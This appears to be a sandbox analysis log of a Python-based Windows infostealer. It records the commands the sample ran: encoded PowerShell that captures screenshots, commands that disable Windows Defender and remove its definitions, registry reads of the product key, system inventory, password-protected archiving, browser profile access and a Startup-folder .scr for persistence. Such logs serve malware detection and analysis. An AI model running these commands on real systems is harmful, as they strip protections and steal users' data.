Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES74CA.tmp" "c:\Users\user\AppData\Local\Temp\bcdu5fii\CSC91B7380AF2C2414A909984B12C6688DE.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand [...]
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,65_2_00007FF69A42B340
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF195E0 cpuid 0_2_00007FF70AF195E0
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_ctypes.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\libffi-7.dll VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\python310.dll VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\select.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_lzma.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_ssl.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_bz2.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_sqlite3.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_socket.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_hashlib.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\_queue.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\Desktop\cmd.exe VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72642\unicodedata.pyd VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
